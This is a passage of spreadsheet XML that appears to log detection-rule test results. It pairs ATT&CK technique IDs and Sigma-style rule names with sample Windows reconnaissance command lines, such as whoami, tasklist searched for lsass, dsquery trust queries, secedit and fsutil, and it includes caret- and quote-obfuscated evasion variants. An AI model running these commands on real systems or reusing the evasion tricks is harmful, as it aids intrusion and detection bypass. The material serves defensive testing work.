      <c r="A1907" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1907" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1907" s="44" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1907" s="44" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1907" s="44" t="inlineStr">
        <is>
          <t>reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer -v svcVersion</t>
        </is>
      </c>
      <c r="F1907" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1907" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1907" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1907" s="44" t="n"/>
      <c r="J1907" s="44" t="n"/>
      <c r="K1907" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1908" ht="15.75" customHeight="1" s="42">
      <c r="A1908" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1908" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1908" s="44" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1908" s="44" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1908" s="44" t="inlineStr">
        <is>
          <t>reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" -v "svcVersion"</t>
        </is>
      </c>
      <c r="F1908" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1908" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1908" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1908" s="44" t="n"/>
      <c r="J1908" s="44" t="n"/>
      <c r="K1908" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1909" ht="15.75" customHeight="1" s="42">
      <c r="A1909" s="44" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1909" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_w32tm</t>
        </is>
      </c>
      <c r="C1909" s="44" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer</t>
        </is>
      </c>
      <c r="D1909" s="44" t="inlineStr">
        <is>
          <t>6da2c9f5-7c53-401b-aacb-92c040ce1215</t>
        </is>
      </c>
      <c r="E1909" s="44" t="inlineStr">
        <is>
          <t>w32tm.exe -stripchart -computer:localhost -period:5 -dataonly -samples:2</t>
        </is>
      </c>
      <c r="F1909" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1909" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1909" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1909" s="44" t="n"/>
      <c r="J1909" s="44" t="n"/>
      <c r="K1909" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1910" ht="15.75" customHeight="1" s="42">
      <c r="A1910" s="44" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
      <c r="B1910" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C1910" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D1910" s="44" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E1910" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-WinEvent -LogName 'Sec*' -FilterXPath '*[System[(EventID=4624)]]'"</t>
        </is>
      </c>
      <c r="F1910" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1910" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1910" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1910" s="44" t="n"/>
      <c r="J1910" s="44" t="n"/>
      <c r="K1910" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1911" ht="15.75" customHeight="1" s="42">
      <c r="A1911" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1911" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1911" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1911" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1911" s="44" t="inlineStr">
        <is>
          <t>secedit.exe "/configure" "/db" mytemplate.db</t>
        </is>
      </c>
      <c r="F1911" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1911" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1911" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1911" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J1911" s="44" t="n"/>
      <c r="K1911" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1912" ht="15.75" customHeight="1" s="42">
      <c r="A1912" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1912" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1912" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1912" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1912" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c secedit.exe /conf^igure /db mytemplate.db</t>
        </is>
      </c>
      <c r="F1912" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1912" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1912" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1912" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J1912" s="44" t="n"/>
      <c r="K1912" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1913" ht="15.75" customHeight="1" s="42">
      <c r="A1913" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1913" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1913" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1913" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1913" s="44" t="inlineStr">
        <is>
          <t>secedit.exe /EXPORT /AREAS SECURITYPOLICY /CFG output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F1913" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1913" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1913" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1913" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J1913" s="44" t="n"/>
      <c r="K1913" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1914" ht="15.75" customHeight="1" s="42">
      <c r="A1914" s="44" t="inlineStr">
        <is>
          <t>t1614.001</t>
        </is>
      </c>
      <c r="B1914" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_lookup</t>
        </is>
      </c>
      <c r="C1914" s="44" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP</t>
        </is>
      </c>
      <c r="D1914" s="44" t="inlineStr">
        <is>
          <t>7090adee-82e2-4269-bd59-80691e7c6338</t>
        </is>
      </c>
      <c r="E1914" s="44" t="inlineStr">
        <is>
          <t>chcp &amp; whoami</t>
        </is>
      </c>
      <c r="F1914" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1914" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1914" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1914" s="44" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP (7090adee-82e2-4269-bd59-80691e7c6338); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J1914" s="44" t="n"/>
      <c r="K1914" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1915" ht="15.75" customHeight="1" s="42">
      <c r="A1915" s="44" t="inlineStr">
        <is>
          <t>t1614.001</t>
        </is>
      </c>
      <c r="B1915" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_lookup</t>
        </is>
      </c>
      <c r="C1915" s="44" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP</t>
        </is>
      </c>
      <c r="D1915" s="44" t="inlineStr">
        <is>
          <t>7090adee-82e2-4269-bd59-80691e7c6338</t>
        </is>
      </c>
      <c r="E1915" s="44" t="inlineStr">
        <is>
          <t>chcp &gt; C:\Temp\test.txt</t>
        </is>
      </c>
      <c r="F1915" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1915" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1915" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1915" s="44" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP (7090adee-82e2-4269-bd59-80691e7c6338); Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892)</t>
        </is>
      </c>
      <c r="J1915" s="44" t="n"/>
      <c r="K1915" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1916" ht="15.75" customHeight="1" s="42">
      <c r="A1916" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1916" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C1916" s="44" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D1916" s="44" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E1916" s="44" t="inlineStr">
        <is>
          <t>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CurrentBuildNumber</t>
        </is>
      </c>
      <c r="F1916" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1916" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1916" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1916" s="44" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries (0022869c-49f7-4ff2-ba03-85ac42ddac58)</t>
        </is>
      </c>
      <c r="J1916" s="44" t="n"/>
      <c r="K1916" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1917" ht="15.75" customHeight="1" s="42">
      <c r="A1917" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1917" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C1917" s="44" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D1917" s="44" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E1917" s="44" t="inlineStr">
        <is>
          <t>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" "-v" CurrentBuildNumber</t>
        </is>
      </c>
      <c r="F1917" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1917" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1917" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1917" s="44" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries (0022869c-49f7-4ff2-ba03-85ac42ddac58)</t>
        </is>
      </c>
      <c r="J1917" s="44" t="n"/>
      <c r="K1917" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1918" ht="15.75" customHeight="1" s="42">
      <c r="A1918" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1918" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C1918" s="44" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D1918" s="44" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E1918" s="44" t="inlineStr">
        <is>
          <t>dtrace.exe -qn "syscall:::return { panic(); }"</t>
        </is>
      </c>
      <c r="F1918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1918" s="44" t="n"/>
      <c r="J1918" s="44" t="n"/>
      <c r="K1918" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1919" ht="15.75" customHeight="1" s="42">
      <c r="A1919" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1919" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C1919" s="44" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D1919" s="44" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E1919" s="44" t="inlineStr">
        <is>
          <t>dtrace.exe -n "syscall:::return { @[execname] = count(); }" -w -llkd(0)</t>
        </is>
      </c>
      <c r="F1919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1919" s="44" t="n"/>
      <c r="J1919" s="44" t="n"/>
      <c r="K1919" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1920" ht="15.75" customHeight="1" s="42">
      <c r="A1920" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1920" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C1920" s="44" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D1920" s="44" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E1920" s="44" t="inlineStr">
        <is>
          <t>dtrace.exe -n "syscall:::return /pid == 0/ { lk""d(0); }"</t>
        </is>
      </c>
      <c r="F1920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1920" s="44" t="n"/>
      <c r="J1920" s="44" t="n"/>
      <c r="K1920" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1921" ht="15.75" customHeight="1" s="42">
      <c r="A1921" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1921" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C1921" s="44" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D1921" s="44" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E1921" s="44" t="inlineStr">
        <is>
          <t>dtrace.exe -n "sysca""ll:::return { lkd(0); }"</t>
        </is>
      </c>
      <c r="F1921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1921" s="44" t="n"/>
      <c r="J1921" s="44" t="n"/>
      <c r="K1921" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1922" ht="15.75" customHeight="1" s="42">
      <c r="A1922" s="44" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1922" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dsquery_domain_trust_discovery</t>
        </is>
      </c>
      <c r="C1922" s="44" t="inlineStr">
        <is>
          <t>Domain Trust Discovery Via Dsquery</t>
        </is>
      </c>
      <c r="D1922" s="44" t="inlineStr">
        <is>
          <t>3bad990e-4848-4a78-9530-b427d854aac0</t>
        </is>
      </c>
      <c r="E1922" s="44" t="inlineStr">
        <is>
          <t>dsquery.exe * -filter "(objectClass=trustedDomain)"</t>
        </is>
      </c>
      <c r="F1922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1922" s="44" t="n"/>
      <c r="J1922" s="44" t="n"/>
      <c r="K1922" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1923" ht="15.75" customHeight="1" s="42">
      <c r="A1923" s="44" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1923" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dsquery_domain_trust_discovery</t>
        </is>
      </c>
      <c r="C1923" s="44" t="inlineStr">
        <is>
          <t>Domain Trust Discovery Via Dsquery</t>
        </is>
      </c>
      <c r="D1923" s="44" t="inlineStr">
        <is>
          <t>3bad990e-4848-4a78-9530-b427d854aac0</t>
        </is>
      </c>
      <c r="E1923" s="44" t="inlineStr">
        <is>
          <t>dsquery.exe * -filter "(objectCategory=trustedDomain)"</t>
        </is>
      </c>
      <c r="F1923" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1923" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1923" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1923" s="44" t="n"/>
      <c r="J1923" s="44" t="n"/>
      <c r="K1923" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1924" ht="15.75" customHeight="1" s="42">
      <c r="A1924" s="44" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1924" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dsquery_domain_trust_discovery</t>
        </is>
      </c>
      <c r="C1924" s="44" t="inlineStr">
        <is>
          <t>Domain Trust Discovery Via Dsquery</t>
        </is>
      </c>
      <c r="D1924" s="44" t="inlineStr">
        <is>
          <t>3bad990e-4848-4a78-9530-b427d854aac0</t>
        </is>
      </c>
      <c r="E1924" s="44" t="inlineStr">
        <is>
          <t>dsquery.exe "trustedDomain"</t>
        </is>
      </c>
      <c r="F1924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1924" s="44" t="n"/>
      <c r="J1924" s="44" t="n"/>
      <c r="K1924" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1925" ht="15.75" customHeight="1" s="42">
      <c r="A1925" s="44" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1925" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dsquery_domain_trust_discovery</t>
        </is>
      </c>
      <c r="C1925" s="44" t="inlineStr">
        <is>
          <t>Domain Trust Discovery Via Dsquery</t>
        </is>
      </c>
      <c r="D1925" s="44" t="inlineStr">
        <is>
          <t>3bad990e-4848-4a78-9530-b427d854aac0</t>
        </is>
      </c>
      <c r="E1925" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c dsquery.exe tru""stedDomain</t>
        </is>
      </c>
      <c r="F1925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1925" s="44" t="n"/>
      <c r="J1925" s="44" t="n"/>
      <c r="K1925" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1926" ht="15.75" customHeight="1" s="42">
      <c r="A1926" s="44" t="inlineStr">
        <is>
          <t>t1057</t>
        </is>
      </c>
      <c r="B1926" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_pipe_output</t>
        </is>
      </c>
      <c r="C1926" s="44" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE</t>
        </is>
      </c>
      <c r="D1926" s="44" t="inlineStr">
        <is>
          <t>ccb5742c-c248-4982-8c5c-5571b9275ad3</t>
        </is>
      </c>
      <c r="E1926" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c tasklist &gt; %temp%\t.txt &amp; findstr lsass %temp%\t.txt</t>
        </is>
      </c>
      <c r="F1926" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1926" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1926" s="44" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE (fe63010f-8823-4864-a96b-a7b4a0f7b929); LSASS Process Reconnaissance Via Findstr.EXE (fe63010f-8823-4864-a96b-a7b4a0f7b929)</t>
        </is>
      </c>
      <c r="J1926" s="44" t="n"/>
      <c r="K1926" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1927" ht="15.75" customHeight="1" s="42">
      <c r="A1927" s="44" t="inlineStr">
        <is>
          <t>t1057</t>
        </is>
      </c>
      <c r="B1927" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_pipe_output</t>
        </is>
      </c>
      <c r="C1927" s="44" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE</t>
        </is>
      </c>
      <c r="D1927" s="44" t="inlineStr">
        <is>
          <t>ccb5742c-c248-4982-8c5c-5571b9275ad3</t>
        </is>
      </c>
      <c r="E1927" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c whoami^|findstr thaimx</t>
        </is>
      </c>
      <c r="F1927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1927" s="44" t="n"/>
      <c r="J1927" s="44" t="n"/>
      <c r="K1927" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1928" ht="15.75" customHeight="1" s="42">
      <c r="A1928" s="44" t="inlineStr">
        <is>
          <t>t1057</t>
        </is>
      </c>
      <c r="B1928" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_pipe_output</t>
        </is>
      </c>
      <c r="C1928" s="44" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE</t>
        </is>
      </c>
      <c r="D1928" s="44" t="inlineStr">
        <is>
          <t>ccb5742c-c248-4982-8c5c-5571b9275ad3</t>
        </is>
      </c>
      <c r="E1928" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c tasklist|\Windows\System32\findstr.exe lsass</t>
        </is>
      </c>
      <c r="F1928" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1928" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1928" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1928" s="44" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE (fe63010f-8823-4864-a96b-a7b4a0f7b929); LSASS Process Reconnaissance Via Findstr.EXE (fe63010f-8823-4864-a96b-a7b4a0f7b929); Recon Command Output Piped To Findstr.EXE (ccb5742c-c248-4982-8c5c-5571b9275ad3)</t>
        </is>
      </c>
      <c r="J1928" s="44" t="n"/>
      <c r="K1928" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1929" ht="15.75" customHeight="1" s="42">
      <c r="A1929" s="44" t="inlineStr">
        <is>
          <t>t1057</t>
        </is>
      </c>
      <c r="B1929" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_pipe_output</t>
        </is>
      </c>
      <c r="C1929" s="44" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE</t>
        </is>
      </c>
      <c r="D1929" s="44" t="inlineStr">
        <is>
          <t>ccb5742c-c248-4982-8c5c-5571b9275ad3</t>
        </is>
      </c>
      <c r="E1929" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c powershell -Command "whoami" | findstr thaimx</t>
        </is>
      </c>
      <c r="F1929" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1929" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1929" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1929" s="44" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE (ccb5742c-c248-4982-8c5c-5571b9275ad3); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J1929" s="44" t="n"/>
      <c r="K1929" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1930" ht="15.75" customHeight="1" s="42">
      <c r="A1930" s="44" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1930" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1930" s="44" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1930" s="44" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1930" s="44" t="inlineStr">
        <is>
          <t>fsutil fsinfo "drives"</t>
        </is>
      </c>
      <c r="F1930" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1930" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1930" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1930" s="44" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration (63de06b9-a385-40b5-8b32-73f2b9ef84b6)</t>
        </is>
      </c>
      <c r="J1930" s="44" t="n"/>
      <c r="K1930" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1931" ht="15.75" customHeight="1" s="42">
      <c r="A1931" s="44" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1931" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1931" s="44" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1931" s="44" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1931" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c fsutil fsinfo dri^ves</t>
        </is>
      </c>
      <c r="F1931" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1931" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1931" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1931" s="44" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration (63de06b9-a385-40b5-8b32-73f2b9ef84b6)</t>
        </is>
      </c>
      <c r="J1931" s="44" t="n"/>
      <c r="K1931" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1932" ht="15.75" customHeight="1" s="42">
      <c r="A1932" s="44" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1932" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1932" s="44" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1932" s="44" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1932" s="44" t="inlineStr">
        <is>
          <t>fsutil fsinfo	drives</t>
        </is>
      </c>
      <c r="F1932" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1932" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1932" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1932" s="44" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration (63de06b9-a385-40b5-8b32-73f2b9ef84b6)</t>
        </is>
      </c>
      <c r="J1932" s="44" t="n"/>
      <c r="K1932" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1933" ht="15.75" customHeight="1" s="42">
      <c r="A1933" s="44" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1933" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1933" s="44" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1933" s="44" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1933" s="44" t="inlineStr">
        <is>
          <t>fsutil fsinfo DRIves</t>
